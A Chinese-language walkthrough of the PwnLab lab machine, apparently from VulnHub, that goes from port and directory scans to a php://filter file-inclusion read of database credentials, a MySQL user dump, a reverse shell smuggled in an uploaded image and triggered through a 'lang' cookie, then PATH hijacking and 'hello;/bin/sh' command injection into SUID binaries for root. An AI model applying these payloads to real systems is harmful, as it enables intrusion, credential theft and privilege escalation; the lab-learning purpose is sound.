本文思路
nmap扫描---->dirb扫描---->nikto扫描---->LFI读取config.php,获得数据库账号密码---->远程登录mysql找到网站用户账户---->上传图片马,通过LFI(cookie参数值)获得反弹shell---->修改$PATH配合suid得到mike的shell---->suid结合命令注入提权
环境信息
攻击机ip:192.168.101.25
靶机ip:192.168.101.37
具体步骤
步骤1:nmap扫描
sudo nmap -sS -A -p- 192.168.101.37
扫描到80端口是Apache httpd,3306端口开放mysql,推测网站应该是apache+php+mysql的组合。
一个可能的思路是:既然3306端口对外开放,那么有可能需要远程连接mysql,也就是说,有可能需要找到mysql账号密码。
步骤2:dirb扫描网站目录,以及网站探索
dirb http://192.168.101.37
从扫描结果(index.php)可以确定网站服务端语言是php
访问 http://192.168.101.37/index.php ,提示上传图片。
从上图可见,网站主页上还有Login和Upload两个链接,点Login会出现登录框,点Upload会提示需要先登录。
根据dirb扫描结果,访问 http://192.168.101.37/images/,是包含一个.png文件的目录
访问 http://192.168.101.37/upload/,目前为空目录
步骤3:nikto扫描
nikto -host 192.168.101.37
扫描结果如上图所示,扫描结果中说http://192.168.101.37/config.php可能有数据库的ID和密码,访问一下这个页面试试。
页面上啥也没有,可能全是php代码
再访问一下 http://192.168.101.37/login.php 试试
和从主页点Login后显示的页面对比,发现表单长得很像
对比一下网页源代码,下面第一张图是直接访问 http://192.168.101.37/login.php ,第二张图是访问 http://192.168.101.37/?page=login ,可以看到表单部分的代码确实是完全一样的。
合理推断,page=后面的参数值可能就是php文件名,这边有可能存在文件包含的动作。
步骤4:利用LFI读取config.php,获得数据库账号密码
如果http://192.168.101.37/?page=处存在本地文件包含漏洞,则可以利用php://filter读取config.php的内容。根据nikto扫描结果,login.php和config.php位于相同目录下,因此可以构造如下url
http://192.168.101.37/?page=php://filter/convert.base64-encode/resource=config
在浏览器中输入上述url,得到base64编码的config.php的内容
解码之后发现config.php的明文内容如下,数据库的用户名是root,密码是H4u%QJ_H99
<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
步骤5: 远程登录mysql找到网站用户账户
用上一步中找到的账户密码(root : H4u%QJ_H99)远程登录靶机的mysql
mysql -h 192.168.101.37 -u root -p
然后依次输入
MySQL [(none)]> show databases;
MySQL [(none)]> use Users;
MySQL [Users]> show tables;
MySQL [Users]> select * from users;
得到网站的用户名和base64编码的密码
base64解码之后得到三个账户密码
kent | JWzXuBJJNy |
mike | SIfdsTEn6I |
kane | iSv5Ym2GRo |
这三组账号密码都可以用于 http://192.168.101.37/?page=login 处的登录。
步骤6:尝试上传反弹shell并利用LFI执行
随便用上个步骤中找到的一个账户登录网站,来到上传文件的页面 http://192.168.101.37/?page=upload
直接上传php文件显示上传失败,只允许上传图片。
上传图片马(jpg文件最后插入php反弹shell代码,反弹shell代码为linux自带的/usr/share/webshells/php/php-reverse-shell.php,注意替换$ip和$port),可以上传成功。
右键 复制图片地址,可以发现图片在upload文件夹下,且被重命名为5aa99052c87e783fa1ab9dc6b1cbaf44.jpg
由于http://192.168.101.37/?page=包含文件的时候,自动加上文件后缀.php,所以其实如果要用上传文件并利用本地文件包含来执行,还是需要最终文件后缀是.php。
用读取config.php文件内容的方法读取upload.php的内容。浏览器访问
http://192.168.101.37/?page=php://filter/convert.base64-encode/resource=upload
base64解码后得到upload.php的内容如下,看不出来怎么才能使最终保存下来的文件后缀是.php
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {
die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}
if(substr_count($filetype, '/')>1){
die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}
?>
步骤7:利用cookie参数值触发LFI getshell
用读取config.php文件内容的方法读取index.php的内容。浏览器访问
http://192.168.101.37/?page=php://filter/convert.base64-encode/resource=index
base64解码后得到index.php的内容如下。
注意到index.php有两处include,之前感知到的include第二处,而第一处include则是在cookie中设置了lang参数的情况下,include当前目录下lang文件夹下cookie中lang参数的值表示的文件。
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>
攻击机上用nc监听2333端口
nc -nlvp 2333
在火狐浏览器中用步骤5中找到的账户登录,hackbar中点Load URL,勾选Cookies,在cookie头中增加
;lang=../upload/5aa99052c87e783fa1ab9dc6b1cbaf44.jpg
使include函数能包含步骤6中上传的图片马。
最后点Execute,攻击机上nc监听的端口出现www-data用户的反弹shell
反弹shell中输入如下命令获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
步骤8: 修改$PATH配合suid得到mike的shell
反弹shell中进入/home目录,发现当前用户没有自己的home目录,但是另外4个用户有。4个用户中,john不知道哪儿来的,kane,kent和mike是老熟人,三位的网站账户密码在步骤5中已经泄露了。
用步骤5中的密码试试看可不可以用于系统登录,尝试之后发现kent和kane是可以登录的,mike无法登录,/home/kent下面什么有意思的东西都没有
切换到kane账号
su kane
注意到/home/kane目录下有个可执行并且有suid的文件msgmike
执行一下试试。
执行过程中报错,执行cat命令时没找到/home/mike/msg.txt文件
这一下把我整不会了,进入知识盲区了,不知道接下来怎么办了。
看了vulnhub官方收录的walkthrough之后,才知道原来这里由于cat命令没有用绝对路径指定,所以可以创建一个名为cat的文件,实际内容是启动一个shell的命令,然后将该文件所在路径加到$PATH变量的最前面,使msgmike执行到调用cat的语句时执行该文件,从而启动mike用户的shell。
开始之前先看一下/etc/passwd文件,看看mike是哪种登录shell
cat /etc/passwd
是/bin/bash
接下来依次输入如下三条命令,他们的含义依次是:
创建内容为/bin/bash,名为cat的文件
赋予cat文件执行权限
将cat文件所在目录/home/kane加入到$PATH变量中
kane@pwnlab:~$ echo "/bin/bash" > cat
kane@pwnlab:~$ chmod +x cat
kane@pwnlab:~$ export PATH=/home/kane:$PATH
此时 $PATH变量 如下
执行
kane@pwnlab:~$ ./msgmike
得到mike的shell
步骤9:suid结合命令注入提权
/home/mike下也有一个有suid的可执行文件msg2root,属主是root,应该是用来提权的
尝试了几下,这个文件执行后会回显输入的参数,似乎是执行了echo命令
用strings命令观察一下msg2root的可读内容
mike@pwnlab:/home/mike$ strings msg2root
确实执行了echo命令,如果命令行输入的参数是没有经过处理直接拼接到echo命令后的,就可以利用命令注入来获得shell。
来试试在Message for root:提示符之后输入如下命令
hello;/bin/sh
得到root的shell(这边用/bin/bash不行,暂时不知道原因)
在/root目录下找到flag.txt